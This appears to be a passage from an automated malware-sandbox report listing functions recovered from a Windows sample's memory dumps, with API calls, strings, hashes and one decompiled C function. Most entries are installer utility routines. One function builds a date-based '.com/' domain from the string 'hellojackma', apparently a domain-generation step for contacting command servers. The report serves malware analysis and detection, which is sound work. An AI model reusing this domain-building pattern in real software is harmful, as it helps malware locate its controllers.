                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                  • API String ID: 3535843008-3023217399
                                                                                                                                                                  • Opcode ID: 42f7fef74cda6ca434e30f4ac7bfd20e302634303b5d7e14fb5bc54bd8e7e582
                                                                                                                                                                  • Instruction ID: 1324a6d1fc4aa40a439a40988d81ed16a0d6238c60a77588973d0548e78c38b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 42f7fef74cda6ca434e30f4ac7bfd20e302634303b5d7e14fb5bc54bd8e7e582
                                                                                                                                                                  • Instruction Fuzzy Hash: F741A275E00216BBCF21DF84D985AAEB7B5EF48750F2290ABF500A7311D7389E41CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042AD9A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0042AD46: __getptd_noexit.LIBCMT ref: 0042AD46
                                                                                                                                                                  • __getbuf.LIBCMT ref: 0042AE31
                                                                                                                                                                  • __lseeki64.LIBCMT ref: 0042AEA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                                                  • String ID: 8aE
                                                                                                                                                                  • API String ID: 3311320906-2942927555
                                                                                                                                                                  • Opcode ID: a8575fd3c179cdf712dd9253e00a6616f67038e1e2463d3a490177ee88c9604c
                                                                                                                                                                  • Instruction ID: 74c1c7918ac0a661b8519aced2efab69e4fdff155066f640028c8d63730da015
                                                                                                                                                                  • Opcode Fuzzy Hash: a8575fd3c179cdf712dd9253e00a6616f67038e1e2463d3a490177ee88c9604c
                                                                                                                                                                  • Instruction Fuzzy Hash: DE414471700B209FC3249F29E88167B77A5AB40330B55861FECAAC73C1D73C98128B1A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004390F7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00438BD5: lstrlenW.KERNEL32(000000F8,?,?,?,00438F73,000000F8,000002A8,000002A8,000000F8,?,?,?,0041EA29,?,?,00000364), ref: 00438BFA
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004391DC
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000000), ref: 004391F6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$lstrlen
                                                                                                                                                                  • String ID: %ls\%ls
                                                                                                                                                                  • API String ID: 1752758355-2125769799
                                                                                                                                                                  • Opcode ID: 59fc4969d8ea8c3170308d01b811e147e5c3ae1a368fb64727c695191318d72c
                                                                                                                                                                  • Instruction ID: 3984e7204ba3d963ed0e7a9177aab7035606cac2870d1a6c3e351e5ea0991e70
                                                                                                                                                                  • Opcode Fuzzy Hash: 59fc4969d8ea8c3170308d01b811e147e5c3ae1a368fb64727c695191318d72c
                                                                                                                                                                  • Instruction Fuzzy Hash: C2310A72C0022ABBDF229F95DD4189EBA79AB08754F01517AF910B2221D7799E109F94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043659F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 00436641
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004366A4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 1948546556-2967768451
                                                                                                                                                                  • Opcode ID: 55dbf7e6de0f0389dc871773a3ed700dd0ac596712c245c4ec030f15a1a0876d
                                                                                                                                                                  • Instruction ID: 5c57caf407ea015b232701e825beb806b8935d4bcee84ec62cb5e3b14280cb60
                                                                                                                                                                  • Opcode Fuzzy Hash: 55dbf7e6de0f0389dc871773a3ed700dd0ac596712c245c4ec030f15a1a0876d
                                                                                                                                                                  • Instruction Fuzzy Hash: D0315171E0026AABDB21CF15D9417DAB3B4BF48741F0191ABA949E7240D7B89DC48F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00434CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • #171.MSI(00000000,?,0043B580,?), ref: 00434CF1
                                                                                                                                                                  • #171.MSI(00000000,?,?,?,?,?,00000000,?,0043B580,?), ref: 00434D31
                                                                                                                                                                    • Part of subcall function 0043497C: #115.MSI(?), ref: 004349AD
                                                                                                                                                                    • Part of subcall function 0043497C: #116.MSI(?,00000001,?), ref: 004349CB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: #171$#115#116
                                                                                                                                                                  • String ID: wiutil.cpp
                                                                                                                                                                  • API String ID: 2532461077-4248292292
                                                                                                                                                                  • Opcode ID: 77c73523d14ccb5a474d1b4a151526fe8e982086c7bb633d159d56178790cb88
                                                                                                                                                                  • Instruction ID: d688242b770a623b51ec2a1a9b8d4f3dda80b29cc4c5a1f69afe2091977f3ad9
                                                                                                                                                                  • Opcode Fuzzy Hash: 77c73523d14ccb5a474d1b4a151526fe8e982086c7bb633d159d56178790cb88
                                                                                                                                                                  • Instruction Fuzzy Hash: 3121A171600618BAEB149EA6CD41FFFBAFCDF89754F10512FB901D6150E338AE009768
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00431D67, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove_s
                                                                                                                                                                  • String ID: \\?\$\\?\UNC
                                                                                                                                                                  • API String ID: 800865076-2523517826
                                                                                                                                                                  • Opcode ID: ddaf5d7b69fb9bc7632fe4449c70cf652aec094dda9671950f9cc552fb30e8d4
                                                                                                                                                                  • Instruction ID: ed4df4d3b1cf0f7c12e4eab863b8a9efe1ddba7793f9bb78ea96b407fb05ebc6
                                                                                                                                                                  • Opcode Fuzzy Hash: ddaf5d7b69fb9bc7632fe4449c70cf652aec094dda9671950f9cc552fb30e8d4
                                                                                                                                                                  • Instruction Fuzzy Hash: F311E922340211B9E7306611DC42FFBB358EB5AB75F909017FA495A5D0E29E7AC1C39D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040DFAE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000009,?,?,?,0040E53C,00000009,?,00000000,?,?,?,00401720), ref: 0040E04A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Logging, xrefs: 0040DFDC
                                                                                                                                                                  • SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 0040DFBD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
                                                                                                                                                                  • API String ID: 3535843008-387823766
                                                                                                                                                                  • Opcode ID: 4f9bf73e0d82573725e985752bc422f512adc7598c4991e28b58bec41b67874f
                                                                                                                                                                  • Instruction ID: 030749e4ff126d86c4d11ad1116c4e7dd4bbd97a093c17d948ca7f2409ed2a9a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f9bf73e0d82573725e985752bc422f512adc7598c4991e28b58bec41b67874f
                                                                                                                                                                  • Instruction Fuzzy Hash: CB11D672A00214B7DB318FA6CE82AAFB7B8EB04754F500477E601761D1D2F95E91D714
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022BBB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E10022BBB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t71;
				void* _t78;

				_t78 = __eflags;
				_push( *(_t71 - 0x1e) & 0x0000ffff);
				E1000CCA3(__edi, _t71 - 0x12c, "hellojackma%04d%02d5",  *(_t71 - 0x20) & 0x0000ffff);
				 *((intOrPtr*)(_t71 - 0x10)) = E1001A4E0(__ebx,  *(_t71 - 0x20) & 0x0000ffff, __edi, __esi, _t78, _t71 - 0x12c);
				 *((intOrPtr*)(_t71 - 0x2f4)) = E10001160(_t71 - 0x27c, _t78,  *((intOrPtr*)(_t71 - 0x10)));
				 *((intOrPtr*)(_t71 - 0x2f8)) =  *((intOrPtr*)(_t71 - 0x2f4));
				 *((char*)(_t71 - 4)) = 0xb;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x2f8)));
				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x27c);
				_push( *((intOrPtr*)(_t71 - 0x10)));
				E1000CA40(__ebx, __edi, __esi, _t78);
				 *((intOrPtr*)(_t71 - 0x2fc)) = E10001160(_t71 - 0x298, _t78, ".com/");
				 *((intOrPtr*)(_t71 - 0x300)) =  *((intOrPtr*)(_t71 - 0x2fc));
				 *((char*)(_t71 - 4)) = 0xc;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x300)));
				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x298);
				E10001110( *((intOrPtr*)(_t71 + 8)), _t78, _t71 - 0x148);
				 *(_t71 - 0x29c) =  *(_t71 - 0x29c) | 0x00000001;
				 *((intOrPtr*)(_t71 - 4)) = 0xffffffff;
				E100011A0(_t71 - 0x148);
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return  *((intOrPtr*)(_t71 + 8));
			}





                                                                                                                                                                  0x10022bbb
                                                                                                                                                                  0x10022bbf
                                                                                                                                                                  0x10022bd1
                                                                                                                                                                  0x10022be8
                                                                                                                                                                  0x10022bfa
                                                                                                                                                                  0x10022c06
                                                                                                                                                                  0x10022c0c
                                                                                                                                                                  0x10022c1d
                                                                                                                                                                  0x10022c22
                                                                                                                                                                  0x10022c2c
                                                                                                                                                                  0x10022c34
                                                                                                                                                                  0x10022c35
                                                                                                                                                                  0x10022c4d
                                                                                                                                                                  0x10022c59
                                                                                                                                                                  0x10022c5f
                                                                                                                                                                  0x10022c70
                                                                                                                                                                  0x10022c75
                                                                                                                                                                  0x10022c7f
                                                                                                                                                                  0x10022ca0
                                                                                                                                                                  0x10022cae
                                                                                                                                                                  0x10022cb4
                                                                                                                                                                  0x10022cc1
                                                                                                                                                                  0x10022ccc
                                                                                                                                                                  0x10022cd6

                                                                                                                                                                  APIs
                                                                                                                                                                  • _sprintf.LIBCMT ref: 10022BD1
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .com/$hellojackma%04d%02d5
                                                                                                                                                                  • API String ID: 2531412260-1062581820
                                                                                                                                                                  • Opcode ID: b3b5e4a9ef3af28ddef4d7ff14b36f0ad95708faccf5eecfd25703a8a2e53819
                                                                                                                                                                  • Instruction ID: cd4cb29569ec0e2556b74841a2cacae5ea17faf8370a901a59aadef40f2aa25d
                                                                                                                                                                  • Opcode Fuzzy Hash: b3b5e4a9ef3af28ddef4d7ff14b36f0ad95708faccf5eecfd25703a8a2e53819
                                                                                                                                                                  • Instruction Fuzzy Hash: F4211575C011299BEB28DB64CC55BEEB7B4EF48380F5081E9E51D63251EB306B84CF51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408EC2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,000000F8,000000FF,IGNOREDEPENDENCIES,00000000,000000F8,?,0041E3D9,00000000,IGNOREDEPENDENCIES,00000000,000003BC,?), ref: 00408F13
                                                                                                                                                                  Strings
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 00408ED0
                                                                                                                                                                  • Failed to copy the property value., xrefs: 00408F47
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                                                                  • API String ID: 1825529933-1412343224
                                                                                                                                                                  • Opcode ID: b794d1c59101629c5583858caeb8a44d263cae718f4ace955032913a256d29ce
                                                                                                                                                                  • Instruction ID: f96c68ac59f347317699d337fe0a07073afac5c922c554633ce395f9cc01c7c8
                                                                                                                                                                  • Opcode Fuzzy Hash: b794d1c59101629c5583858caeb8a44d263cae718f4ace955032913a256d29ce
                                                                                                                                                                  • Instruction Fuzzy Hash: 0211E732604212AFDB109E54DD84F9A73A2BB04360F21413BFB58BB2D1CB38A840C79C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041E934, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to check the dictionary of unique dependencies., xrefs: 0041E966
                                                                                                                                                                  • Failed to add "%ls" to the string dictionary., xrefs: 0041E99C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcstok_s
                                                                                                                                                                  • String ID: Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.
                                                                                                                                                                  • API String ID: 86363921-3357719049
                                                                                                                                                                  • Opcode ID: 1889f9bbdea3096e0420c011ebc27a1313e5d69039e1efe62e58e650f48ba375
                                                                                                                                                                  • Instruction ID: 47e5814851f934421269b8b82c3deee705c5f10cf98d93002a8e670473a92e75
                                                                                                                                                                  • Opcode Fuzzy Hash: 1889f9bbdea3096e0420c011ebc27a1313e5d69039e1efe62e58e650f48ba375
                                                                                                                                                                  • Instruction Fuzzy Hash: EA017BB6910228BBC36161479C01EDF6A6CDF95B75F10012BFC08A6100E61D9E4186ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004380B4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00412674,?,00000001,20000004,00000000,00000000,?,00000000), ref: 004380E3
                                                                                                                                                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00412674,?), ref: 004380FE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoNamedSecuritySleep
                                                                                                                                                                  • String ID: aclutil.cpp
                                                                                                                                                                  • API String ID: 2352087905-2159165307
                                                                                                                                                                  • Opcode ID: ec7756fb6a7cfadaf5478f130e5dc0d97147c34b31cafa95f6074806945ac206
                                                                                                                                                                  • Instruction ID: b845fa26ced751fd315098cf6dc2a2135faa2681181a3235f73b01f59f6026fd
                                                                                                                                                                  • Opcode Fuzzy Hash: ec7756fb6a7cfadaf5478f130e5dc0d97147c34b31cafa95f6074806945ac206
                                                                                                                                                                  • Instruction Fuzzy Hash: A5015E33901229BBCF125E95CD05A8FBA75EF89754F02111AFE0466120DB398D22A7D4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004332D8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LCMapStringW.KERNEL32(0000007F,00000000,00000000,000000F8,00000000,000000F8,00000000,00000000,000000F8,00000000,00000000,00000000,?,00434154,00000000,00000000), ref: 0043331C
                                                                                                                                                                  • GetLastError.KERNEL32(?,00434154,00000000,00000000,000000F8,00000200,?,00437D2D,00000000,000000F8,00000000,000000F8,00000000,00000000,00000000), ref: 00433326
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastString
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 3728238275-3612885251
                                                                                                                                                                  • Opcode ID: fa4a53a6279ed186365556dd42a99a1f2e90ecbf70af5d16c93ea6df15b1371d
                                                                                                                                                                  • Instruction ID: d130062488f1d919d7b15b45c07dfeedbaad822b6e62964ea8f72955ec642c36
                                                                                                                                                                  • Opcode Fuzzy Hash: fa4a53a6279ed186365556dd42a99a1f2e90ecbf70af5d16c93ea6df15b1371d
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A0128339002257BDB219EA79C04F5BBBA8EF49761F010226FE14EB251CB35CC108BE4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FCB4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0040FCD0
                                                                                                                                                                  • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 0040FD2A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize COM on cache thread., xrefs: 0040FCDC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
